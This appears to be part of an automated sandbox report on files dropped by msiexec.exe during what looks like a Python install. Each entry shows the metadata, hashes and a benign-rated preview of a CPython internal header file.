                                                                                                                                Preview:/* An arena-like memory interface for the compiler... */....#ifndef Py_INTERNAL_PYARENA_H..#define Py_INTERNAL_PYARENA_H..#ifdef __cplusplus..extern "C" {..#endif....#ifndef Py_BUILD_CORE..# error "this header requires Py_BUILD_CORE define"..#endif....typedef struct _arena PyArena;..../* _PyArena_New() and _PyArena_Free() create a new arena and free it,.. respectively. Once an arena has been created, it can be used.. to allocate memory via _PyArena_Malloc(). Pointers to PyObject can.. also be registered with the arena via _PyArena_AddPyObject(), and the.. arena will ensure that the PyObjects stay alive at least until.. _PyArena_Free() is called. When an arena is freed, all the memory it.. allocated is freed, the arena releases internal references to registered.. PyObject*, and none of its pointers are valid... XXX (tim) What does "none of its pointers are valid" mean? Does it.. XXX mean that pointers previously obtained via _PyArena_Malloc() are.. XXX no longer
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2600
                                                                                                                                Entropy (8bit):5.078911038305001
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:gHTHyxba+dfNqkKOaOVOoutzkAJlJkL4JauNOTm9/q829YHYjEJjJ6z/FjUL/Y92:ATyx+QNTuhkAJ3m4Jajm9/qX9YHYjujn
                                                                                                                                MD5:B94ED961DAFE67ECD340DDC36BC716DB
                                                                                                                                SHA1:694ABC17B4F3D878DC7DF383BB4447FCF5B4A699
                                                                                                                                SHA-256:6F790EBD52136B0268A9D06DB79CDEC7E03FC0526DCD913B962BC2778CB19820
                                                                                                                                SHA-512:3A8DDD49E146DC2C7D698D007BAB9D8FA254ACBACB0534FFC8F13D9FF91D3AB3B2C2D4946F2E93F758DB8E51591DF256EB0562E97E95A895490F10F25C332CA4
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_INTERNAL_PYERRORS_H..#define Py_INTERNAL_PYERRORS_H..#ifdef __cplusplus..extern "C" {..#endif....#ifndef Py_BUILD_CORE..# error "this header requires Py_BUILD_CORE define"..#endif....../* runtime lifecycle */....extern PyStatus _PyErr_InitTypes(PyInterpreterState *);..extern void _PyErr_FiniTypes(PyInterpreterState *);....../* other API */....static inline PyObject* _PyErr_Occurred(PyThreadState *tstate)..{.. assert(tstate != NULL);.. return tstate->curexc_type;..}....static inline void _PyErr_ClearExcState(_PyErr_StackItem *exc_state)..{.. Py_CLEAR(exc_state->exc_value);..}....PyAPI_FUNC(PyObject*) _PyErr_StackItemToExcInfoTuple(.. _PyErr_StackItem *err_info);....PyAPI_FUNC(void) _PyErr_Fetch(.. PyThreadState *tstate,.. PyObject **type,.. PyObject **value,.. PyObject **traceback);....PyAPI_FUNC(int) _PyErr_ExceptionMatches(.. PyThreadState *tstate,.. PyObject *exc);....PyAPI_FUNC(void) _PyErr_Restore(.. PyThreadState *tstate,.. PyObject
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):216
                                                                                                                                Entropy (8bit):5.049933652696863
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:B6g8Q0jgRrMa5H/HQUZnaQGIvGFjkNcULCaDSel:B6rLWr3Z/HQUZaQGIGjkNcSX
                                                                                                                                MD5:69CE48D3A014D4BB0D5A34694E17A6C0
                                                                                                                                SHA1:1BE95155C0675E4F6F23BA3D611EC423F56F9223
                                                                                                                                SHA-256:464EF87B28946E503532B64702CA245FED4BBD5F06108AAC8C093569C12CED60
                                                                                                                                SHA-512:07508271AF36914835B2A0CC8AC5C867348AFAEC5AC5EE9C4E456FA4117755234DFF7FF3918E80AD9769708030461FAC2FAED68F2C0A9CEB80FC00AC4EA9F64B
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_INTERNAL_HASH_H..#define Py_INTERNAL_HASH_H....#ifndef Py_BUILD_CORE..# error "this header requires Py_BUILD_CORE define"..#endif....uint64_t _Py_KeyedHash(uint64_t, const char *, Py_ssize_t);....#endif..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):3610
                                                                                                                                Entropy (8bit):5.063774954948243
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:px+NfyIcYOtZ/r7agvKh66pOI6QcTWBWSDy:pcNmYgKgaZOScqbDy
                                                                                                                                MD5:E031D5736401AA15A6462A4623438D19
                                                                                                                                SHA1:24C5D89BD9710B6D84A6C61A7F6379C7FE21D468
                                                                                                                                SHA-256:55840F133CC19E57B2B262372653F25DDC156A00B14EDFE5FF7FD755DBAE956F
                                                                                                                                SHA-512:80EECE45FCCA79C82D9E13D7C70D81E376487C452F56080136FCF1885BDC3B8618A080D469DEC5CF16ADD060B1118D5901B7AC57C9790FB9DE6CE169268A96E3
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_INTERNAL_LIFECYCLE_H..#define Py_INTERNAL_LIFECYCLE_H..#ifdef __cplusplus..extern "C" {..#endif....#ifndef Py_BUILD_CORE..# error "this header requires Py_BUILD_CORE define"..#endif....#include "pycore_runtime.h" // _PyRuntimeState..../* Forward declarations */..struct _PyArgv;..struct pyruntimestate;..../* True if the main interpreter thread exited due to an unhandled.. * KeyboardInterrupt exception, suggesting the user pressed ^C. */..PyAPI_DATA(int) _Py_UnhandledKeyboardInterrupt;....extern int _Py_SetFileSystemEncoding(.. const char *encoding,.. const char *errors);..extern void _Py_ClearFileSystemEncoding(void);..extern PyStatus _PyUnicode_InitEncodings(PyThreadState *tstate);..#ifdef MS_WINDOWS..extern int _PyUnicode_EnableLegacyWindowsFSEncoding(void);..#endif....PyAPI_FUNC(void) _Py_ClearStandardStreamEncoding(void);....PyAPI_FUNC(int) _Py_IsLocaleCoercionTarget(const char *ctype_loc);..../* Various one-time initializers */....extern PyStatus _PyFaulthan
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):9659
                                                                                                                                Entropy (8bit):4.831934213097019
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:tx+qtG+p4gfjrGtDOxaTxItTgoUcpqOE2okalu1oIxvEwzqvqzqvUuk1voPA:tcqRpXGtDUQwFpbn1Su1oIxMHtpkGPA
                                                                                                                                MD5:3F27199B60B384BE77487AFE15CA35A9
                                                                                                                                SHA1:693596F1761A19BEFA4AB09BE15CBA97621FB8A1
                                                                                                                                SHA-256:5AC0AE6ADE537233704531868FA21BE34F62A22870C86A3082AC24B21A2E7497
                                                                                                                                SHA-512:B4E1B30FFAA5020790A55B450BAC52D174C95B74931627740087D778009C95533C5DF41120721458D2F0A08ADDEC9D6903A1E437118CB1139A84D7FE60DFE356
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_INTERNAL_PYMATH_H..#define Py_INTERNAL_PYMATH_H..#ifdef __cplusplus..extern "C" {..#endif....#ifndef Py_BUILD_CORE..# error "this header requires Py_BUILD_CORE define"..#endif....../* _Py_ADJUST_ERANGE1(x).. * _Py_ADJUST_ERANGE2(x, y).. * Set errno to 0 before calling a libm function, and invoke one of these.. * macros after, passing the function result(s) (_Py_ADJUST_ERANGE2 is useful.. * for functions returning complex results). This makes two kinds of.. * adjustments to errno: (A) If it looks like the platform libm set.. * errno=ERANGE due to underflow, clear errno. (B) If it looks like the.. * platform libm overflowed but didn't set errno, force errno to ERANGE. In.. * effect, we're trying to force a useful implementation of C89 errno.. * behavior... * Caution:.. * This isn't reliable. C99 no longer requires libm to set errno under.. * any exceptional condition, but does require +- HUGE_VAL return.. * values on overflow. A 754 box *probably* maps H
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):3822
                                                                                                                                Entropy (8bit):5.217379315529593
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:gpUxbaAe7JZA0CpX/0bl/yWYxTwyTKlQK/Z/Z/hQK/Z/Z/wWPkk495Kjwm9:Zx+DbNyWYdArRR5rRRIWPR9
                                                                                                                                MD5:56E841C80764834BB270C4F477E5D658
                                                                                                                                SHA1:79A48442E1B586D083A1B50C1E6B68087C8F9DF6
                                                                                                                                SHA-256:D0F02B964C92717CB9A93712D00677446ECE3CEA888F82C58624C4A2DE8ACDBB
                                                                                                                                SHA-512:90197A66C14DCC275521F99C4404A93615864CDCE887F3758F3D7107C7BFA997D5F5FA6E8198E653F4C9DC05B8099028599F2715A8E5958707F802E68C66A3B8
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_INTERNAL_PYMEM_H..#define Py_INTERNAL_PYMEM_H..#ifdef __cplusplus..extern "C" {..#endif....#ifndef Py_BUILD_CORE..# error "this header requires Py_BUILD_CORE define"..#endif....#include "pymem.h" // PyMemAllocatorName....../* Set the memory allocator of the specified domain to the default... Save the old allocator into *old_alloc if it's non-NULL... Return on success, or return -1 if the domain is unknown. */..PyAPI_FUNC(int) _PyMem_SetDefaultAllocator(.. PyMemAllocatorDomain domain,.. PyMemAllocatorEx *old_alloc);..../* Special bytes broadcast into debug memory blocks at appropriate times... Strings of these are unlikely to be valid addresses, floats, ints or.. 7-bit ASCII..... - PYMEM_CLEANBYTE: clean (newly allocated) memory.. - PYMEM_DEADBYTE dead (newly freed) memory.. - PYMEM_FORBIDDENBYTE: untouchable bytes at each end of a block.... Byte patterns 0xCB, 0xDB and 0xFB have been replaced with 0xCD, 0xDD and.. 0xFD to use the same values tha
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):4274
                                                                                                                                Entropy (8bit):4.9987628895820295
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:Zx+M6gR6nRGQY9q9vRYuLTa6jQKRLX6j23gRemUw8XJDicKiXVZNm52Kcv0yiTWc:Zc4snRGQCEvR/zvRLVQRemUtJicJZm5v
                                                                                                                                MD5:1DDD79A3BAD5B67CB84211968A0055FA
                                                                                                                                SHA1:2071E1082A4C653855F356FDED52BA8C1BD61FC1
                                                                                                                                SHA-256:360C0096986E4472112AFED8E827B2CCEFBA0B2B680AC0C2A9342316FFADE5F7
                                                                                                                                SHA-512:5B357DDEF1BDCA0FF6CFDA8D0BE28ABFB3F18C9940D7419C3AC2A67A675B3100846539F15DBA5AC4A2C90DE550EA278051B12EFDD58BE2957A793D77717B02D1
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_INTERNAL_PYSTATE_H..#define Py_INTERNAL_PYSTATE_H..#ifdef __cplusplus..extern "C" {..#endif....#ifndef Py_BUILD_CORE..# error "this header requires Py_BUILD_CORE define"..#endif....#include "pycore_runtime.h" /* PyRuntimeState */....../* Check if the current thread is the main thread... Use _Py_IsMainInterpreter() to check if it's the main interpreter. */..static inline int.._Py_IsMainThread(void)..{.. unsigned long thread = PyThread_get_thread_ident();.. return (thread == _PyRuntime.main_thread);..}......static inline PyInterpreterState *.._PyInterpreterState_Main(void)..{.. return _PyRuntime.interpreters.main;..}....static inline int.._Py_IsMainInterpreter(PyInterpreterState *interp)..{.. return (interp == _PyInterpreterState_Main());..}......static inline const PyConfig *.._Py_GetMainConfig(void)..{.. PyInterpreterState *interp = _PyInterpreterState_Main();.. if (interp == NULL) {.. return NULL;.. }.. return _PyInterpreterState_GetConfi
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):6169
                                                                                                                                Entropy (8bit):4.830801223414485
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:xx+fvEqfoFZG4TaDMyCAeigMJCx3wSKCnl7c3FogGMwRLQjWRnwX4r:xcfvEnG4TSuJLCwRLQaRnwor
                                                                                                                                MD5:82FBE817C67EABC17E4BB6D65031BBA0
                                                                                                                                SHA1:E84DD5959E06ACFA3745A64896098798513F6007
                                                                                                                                SHA-256:502D92B95C3491577922D6A7D85992619876C6F03B572427A9A0943377601DD2
                                                                                                                                SHA-512:9048ADA658698E7E139FD721E580EBB9E1A3049223F7849B12981F652876DE0C389892CB7825C69941BDE4517C992D9D152AACA62AFBD493958136D9007D2DF3
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_INTERNAL_RUNTIME_H..#define Py_INTERNAL_RUNTIME_H..#ifdef __cplusplus..extern "C" {..#endif....#ifndef Py_BUILD_CORE..# error "this header requires Py_BUILD_CORE define"..#endif....#include "pycore_atomic.h" /* _Py_atomic_address */..#include "pycore_gil.h" // struct _gil_runtime_state..#include "pycore_global_objects.h" // struct _Py_global_objects..#include "pycore_interp.h" // PyInterpreterState..#include "pycore_unicodeobject.h" // struct _Py_unicode_runtime_ids....../* ceval state */....struct _ceval_runtime_state {.. /* Request for checking signals. It is shared by all interpreters (see.. bpo-40513). Any thread of any interpreter can receive a signal, but only.. the main thread of the main interpreter can handle signals: see.. _Py_ThreadCanHandleSignals(). */.. _Py_atomic_int signals_pending;.. struct _gil_runtime_state gil;..};..../* GIL state */....struct _gilstate_runtime_state {.. /* bpo-26558: Flag to
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):50348
                                                                                                                                Entropy (8bit):4.267640444908391
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:7PLB/qln6+e7hkD5DnnyGbsLu8eEHaVw/uFEKoK2:7PLBil6+HNnnzjA
                                                                                                                                MD5:8A00AADF5A566E12215512210826EA84
                                                                                                                                SHA1:B010984F7DC62B64A9053EC84985BE60BC20C5FF
                                                                                                                                SHA-256:860B0112848E000A33FB4EC4F12C639562AE7AF17B2FAD982E3BB1EAD2B9C1BA
                                                                                                                                SHA-512:82127E5D57D69DB7864C52728F3E9A54640DDC03A7827CAA65FE6CBEEC5D3146F7C46120B08D7CF84F1853B156A038611F7F7406FCB03DD3BFEB7707ED1DB50B
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_INTERNAL_RUNTIME_INIT_H..#define Py_INTERNAL_RUNTIME_INIT_H..#ifdef __cplusplus..extern "C" {..#endif....#ifndef Py_BUILD_CORE..# error "this header requires Py_BUILD_CORE define"..#endif....#include "pycore_object.h"....../* The static initializers defined here should only be used.. in the runtime init code (in pystate.c and pylifecycle.c). */......#define _PyRuntimeState_INIT \.. { \.. .gilstate = { \.. .check_enabled = 1, \.. /* A TSS key must be initialized with Py_tss_NEEDS_INIT \.. in accordance with the specification. */ \.. .autoTSSkey = Py_tss_NEEDS_INIT, \.. }, \.. .interpreters = { \.. /* This prevents interpreters from getting created \.. until _PyInterpreterState_Enable() is called. */ \.. .next_id = -1, \.. }, \.. .global_objects = _Py_global_objects_INIT, \.. ._main_interpreter = _PyInterpreterState_INIT, \.. }....#ifdef HAVE_DLO
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):972
                                                                                                                                Entropy (8bit):5.110949072358662
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:fQJDTLexwUZaGUfqWFF8BgaA7IvIWOrcdUBIxr:cXexbaVncgDIrOIdBr
                                                                                                                                MD5:92E00E6F016B6C987EC73FECB4B7DEE8
                                                                                                                                SHA1:A606B44D981B0B1A02E98B7F2E59CDACFA9CDCFB
                                                                                                                                SHA-256:D32D483731AC145F81D1E68F71F69B2810504A5D7BBDAAD2CDF391EAE33A98DB
                                                                                                                                SHA-512:CAE808DD14974987636C93F8DC382455F4C34A6A3DEB9607694EC10A31B3CB78439E2DC113B341F3F990B6D8EDD39CEB5F1B7C96CD8D040DFD0D287AAE8CCA6E
                                                                                                                                Malicious:false
                                                                                                                                Preview:// Define Py_NSIG constant for signal handling.....#ifndef Py_INTERNAL_SIGNAL_H..#define Py_INTERNAL_SIGNAL_H..#ifdef __cplusplus..extern "C" {..#endif....#ifndef Py_BUILD_CORE..# error "this header requires Py_BUILD_CORE define"..#endif....#include <signal.h> // NSIG....#ifdef _SIG_MAXSIG.. // gh-91145: On FreeBSD, <signal.h> defines NSIG as 32: it doesn't include.. // realtime signals: [SIGRTMIN,SIGRTMAX]. Use _SIG_MAXSIG instead. For.. // example on x86-64 FreeBSD 13, SIGRTMAX is 126 and _SIG_MAXSIG is 128...# define Py_NSIG _SIG_MAXSIG..#elif defined(NSIG)..# define Py_NSIG NSIG..#elif defined(_NSIG)..# define Py_NSIG _NSIG // BSD/SysV..#elif defined(_SIGMAX)..# define Py_NSIG (_SIGMAX + 1) // QNX..#elif defined(SIGMAX)..# define Py_NSIG (SIGMAX + 1) // djgpp..#else..# define Py_NSIG 64 // Use a reasonable default value..#endif....#ifdef __cplusplus..}..#endif..#endif // !Py_INTERNAL_SIGNAL_H..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):356
                                                                                                                                Entropy (8bit):5.128756354433609
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:B6grsmgd2Q0jgrsmgdmjQ6z4rMa5H/HQUZnaQGIvG24BVmZNluzR4a0jQ6dnngrw:B6yNLyX4r3Z/HQUZaQGIPNnnyQ
                                                                                                                                MD5:77326556BF2C9FF384259C44BB6D3891
                                                                                                                                SHA1:A2A4D47B73A5B30F339716F6C35A907A22EBBC09
                                                                                                                                SHA-256:DD4602B5E33E37892012C7867E3565136FACE799146060AD55B29B36890A1924
                                                                                                                                SHA-512:734E5FCBFBDF7525FFF6F88557CB97B077C529F8542290F6496D57EDE930C31276CFBA8421918EDA30C8E0ABF3A429772588942B6642445871BF61ED7705574A
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_INTERNAL_SLICEOBJECT_H..#define Py_INTERNAL_SLICEOBJECT_H..#ifdef __cplusplus..extern "C" {..#endif....#ifndef Py_BUILD_CORE..# error "this header requires Py_BUILD_CORE define"..#endif....../* runtime lifecycle */....extern void _PySlice_Fini(PyInterpreterState *);......#ifdef __cplusplus..}..#endif..#endif /* !Py_INTERNAL_SLICEOBJECT_H */..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):973
                                                                                                                                Entropy (8bit):5.099449530775489
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:gAqvHLAqv6xwUZaGSKUE9f2diponoMnAL:gAqvrAqv6xba0pfWieAL
                                                                                                                                MD5:B05057ADE92717ACF6888B85FADECD1E
                                                                                                                                SHA1:3EEBDDAF984377ACBF69E8C31ED585E773D44C97
                                                                                                                                SHA-256:57EAD535E7F16A387CE14C7B4FFA1C9086A03D53EBCE25FA3C6D7AFF06413EDA
                                                                                                                                SHA-512:CA1C1A78625B099330AC34543FCF81106EF0C40D5279C713AF755095AC9AB72A9D4AFF981E357A92A3400C5EA696076D037EDDD3828D24E072A71BA72B6D37F4
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_INTERNAL_STRHEX_H..#define Py_INTERNAL_STRHEX_H..#ifdef __cplusplus..extern "C" {..#endif....#ifndef Py_BUILD_CORE..# error "this header requires Py_BUILD_CORE define"..#endif....// Returns a str() containing the hex representation of argbuf...PyAPI_FUNC(PyObject*) _Py_strhex(const.. char* argbuf,.. const Py_ssize_t arglen);....// Returns a bytes() containing the ASCII hex representation of argbuf...PyAPI_FUNC(PyObject*) _Py_strhex_bytes(.. const char* argbuf,.. const Py_ssize_t arglen);....// These variants include support for a separator between every N bytes:..PyAPI_FUNC(PyObject*) _Py_strhex_with_sep(.. const char* argbuf,.. const Py_ssize_t arglen,.. PyObject* sep,.. const int bytes_per_group);..PyAPI_FUNC(PyObject*) _Py_strhex_bytes_with_sep(.. const char* argbuf,.. const Py_ssize_t arglen,.. PyObject* sep,.. const int bytes_per_group);....#ifdef __cplusplus..}..#endif..#endif /* !Py_INTERNAL_STRHEX_H */..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):608
                                                                                                                                Entropy (8bit):5.175427303458327
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:B6kCLkI4r3Z/HQUZaQGI3onI22gREtQKEsXcV1heREtQotDJTnkn:g9LUxwUZaGi2V6ocn/JTnA
                                                                                                                                MD5:B13FF28F41AD5925CFA2F52D7B31797C
                                                                                                                                SHA1:D12C60EE47817EFC113A650A1E5DBA709C589C39
                                                                                                                                SHA-256:5F6B84D6CE7676EBEDDFF785433BF927BB64CA5521518D07E612ED3042E29100
                                                                                                                                SHA-512:064B37B96ADFDF4163ACEFD3DE4477CCF86A069BFDE381756ED7F047A9E5100E8F8B223A495846DEDB911D98A72707A3591B52AB2968AD31EE504DA11D20F312
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_INTERNAL_STRUCTSEQ_H..#define Py_INTERNAL_STRUCTSEQ_H..#ifdef __cplusplus..extern "C" {..#endif....#ifndef Py_BUILD_CORE..# error "this header requires Py_BUILD_CORE define"..#endif....../* other API */....PyAPI_FUNC(PyTypeObject *) _PyStructSequence_NewType(.. PyStructSequence_Desc *desc,.. unsigned long tp_flags);....PyAPI_FUNC(int) _PyStructSequence_InitType(.. PyTypeObject *type,.. PyStructSequence_Desc *desc,.. unsigned long tp_flags);....extern void _PyStructSequence_FiniType(PyTypeObject *type);....#ifdef __cplusplus..}..#endif..#endif /* !Py_INTERNAL_STRUCTSEQ_H */..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):5772
                                                                                                                                Entropy (8bit):4.7697191677722985
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:px+HP9NJVwTkeFkUr4U7UD3FW/vY9VYykYyBwWuEflS5iJsrGc6Sr0:pcvJaweGUr4U7UD3M3Y9qIgw75QsrKO0
                                                                                                                                MD5:352F13F2943E0CDB3DD180B11D8793A3
                                                                                                                                SHA1:1B1D0A3D7613834F1E1D50B48C8CB53AF22EE637
                                                                                                                                SHA-256:3E136EBDB043812B3275A4BA6C4F41F7D68FA053EE718F760BF025FEE5734BE5
                                                                                                                                SHA-512:8545A16E1BB65C7FAA300C36A22FFFF7274B1C3EDE295FB899451AF06CC9815AA36305150E0F744B1BEFBE257AE3B5D8B454148BC8E601DF33E1A07CA28B6634
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_INTERNAL_SYMTABLE_H..#define Py_INTERNAL_SYMTABLE_H..#ifdef __cplusplus..extern "C" {..#endif....#ifndef Py_BUILD_CORE..# error "this header requires Py_BUILD_CORE define"..#endif....struct _mod; // Type defined in pycore_ast.h....typedef enum _block_type { FunctionBlock, ClassBlock, ModuleBlock, AnnotationBlock }.. _Py_block_ty;....typedef enum _comprehension_type {.. NoComprehension = 0,.. ListComprehension = 1,.. DictComprehension = 2,.. SetComprehension = 3,.. GeneratorExpression = 4 } _Py_comprehension_ty;....struct _symtable_entry;....struct symtable {.. PyObject *st_filename; /* name of file being compiled,.. decoded from the filesystem encoding */.. struct _symtable_entry *st_cur; /* current symbol table entry */.. struct _symtable_entry *st_top; /* symbol table entry for module */.. PyObject *st_blocks; /* dict: map AST node addresses.. *
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):631
                                                                                                                                Entropy (8bit):5.261304171175733
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:B6ELy4r3Z/HQUZaQGI5EJNvQ/BjkF/TMAMixnsf8+GEJERnFD:gELNxwUZaGKUpidMganPonFD
                                                                                                                                MD5:DE42A2E15DCD33CD15C5C85DCEBDC054
                                                                                                                                SHA1:3613379848AB6AEE8253AC20AE257692FEB42111
                                                                                                                                SHA-256:67AEFDDB4B4F425C1E84B81B0501D96D47730B695231F61714E0B9292FFF29FF
                                                                                                                                SHA-512:9AAC217A1D55E63C9A1DE20FC2BF367A7D127DB924566CFE2DBAD07717A5B4FFBA6331283E9999C4B014953491D13B9CE11DF946496599A05867B4C31EF338F6
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_INTERNAL_SYSMODULE_H..#define Py_INTERNAL_SYSMODULE_H..#ifdef __cplusplus..extern "C" {..#endif....#ifndef Py_BUILD_CORE..# error "this header requires Py_BUILD_CORE define"..#endif....PyAPI_FUNC(int) _PySys_Audit(.. PyThreadState *tstate,.. const char *event,.. const char *argFormat,.. ...);..../* We want minimal exposure of this function, so use extern rather than.. PyAPI_FUNC() to not export the symbol. */..extern void _PySys_ClearAuditHooks(PyThreadState *tstate);....PyAPI_FUNC(int) _PySys_SetAttr(PyObject *, PyObject *);....#ifdef __cplusplus..}..#endif..#endif /* !Py_INTERNAL_SYSMODULE_H */..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):3602
                                                                                                                                Entropy (8bit):4.953209956640188
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:dx+a8BZsk83bbcBVGOjZ2LIjvwPSGJY5nMRe:dcJZsk8rbcrXYaGq5MRe
                                                                                                                                MD5:E361329603A56050E7BD3610C06BC80C
                                                                                                                                SHA1:5C530A26A9BF630BEDCD1C775EA267CB23098849
                                                                                                                                SHA-256:9A74237545502B63F687AFF160C9858746A215B0E94903250631F3BB257842D5
                                                                                                                                SHA-512:F8B1994D36069F45EDE03CB70732DE73C7BCD451C4D104A4A17E68EC47643B317292A59573A6B1BF585EF1F7FBA1B6999F4D902392C6DA530F6FB4856411A00D
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_INTERNAL_TRACEBACK_H..#define Py_INTERNAL_TRACEBACK_H..#ifdef __cplusplus..extern "C" {..#endif....#ifndef Py_BUILD_CORE..# error "this header requires Py_BUILD_CORE define"..#endif..../* Write the Python traceback into the file 'fd'. For example:.... Traceback (most recent call first):.. File "xxx", line xxx in <xxx>.. File "xxx", line xxx in <xxx>.. ..... File "xxx", line xxx in <xxx>.... This function is written for debug purpose only, to dump the traceback in.. the worst case: after a segmentation fault, at fatal error, etc. That's why,.. it is very limited. Strings are truncated to 100 characters and encoded to.. ASCII with backslashreplace. It doesn't write the source code, only the.. function name, filename and line number of each frame. Write only the first.. 100 frames: if the traceback is truncated, write the line " ..."..... This function is signal safe. */....PyAPI_FUNC(void) _Py_DumpTraceback(.. int fd,..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2162
                                                                                                                                Entropy (8bit):5.179408314307324
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:gfWxba1bQv7Upwt0we+Hl80ou3ebgYFxcZvHSfpMVtSZa:Zx+1Mgpwt0weIlRZebgY+vyfCVtS8
                                                                                                                                MD5:5CA1078976B12938D585D9B43957FB76
                                                                                                                                SHA1:9654365C60BD249BF0AFC3199CC9EC1A9BEADBC7
                                                                                                                                SHA-256:E1CE563E57713860F83B05B8EBC225B1D0290FD7A461D0DFBC700A1222792ABC
                                                                                                                                SHA-512:E89A4F05B2FBC4831B915302F47E739D49962D44721A0F4BEA6F932D4F3EC1C3D3C8663C3FE2739EBB517B9C18CB87941AFB255E0ADA1C1D7E13DBF08DC86DD3
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_INTERNAL_TUPLE_H..#define Py_INTERNAL_TUPLE_H..#ifdef __cplusplus..extern "C" {..#endif....#ifndef Py_BUILD_CORE..# error "this header requires Py_BUILD_CORE define"..#endif....#include "tupleobject.h" /* _PyTuple_CAST() */....../* runtime lifecycle */....extern PyStatus _PyTuple_InitGlobalObjects(PyInterpreterState *);..extern PyStatus _PyTuple_InitTypes(PyInterpreterState *);..extern void _PyTuple_Fini(PyInterpreterState *);....../* other API */....// PyTuple_MAXSAVESIZE - largest tuple to save on free list..// PyTuple_MAXFREELIST - maximum number of tuples of each size to save....#if defined(PyTuple_MAXSAVESIZE) && PyTuple_MAXSAVESIZE <= 0.. // A build indicated that tuple freelists should not be used...# define PyTuple_NFREELISTS 0..# undef PyTuple_MAXSAVESIZE..# undef PyTuple_MAXFREELIST....#elif !defined(WITH_FREELISTS)..# define PyTuple_NFREELISTS 0..# undef PyTuple_MAXSAVESIZE..# undef PyTuple_MAXFREELIST....#else.. // We are using a freelist for tuples.
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1208
                                                                                                                                Entropy (8bit):5.172081847927794
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:gkLtxwUZaGXSsOIOWRru7OCyqt+zWwI/UnV30lz3HSTbwn5snN:gktxbaI6OCztu2UnVklzXA2aN
                                                                                                                                MD5:55F0B8BEA79C762A69A1E3214CD2D28C
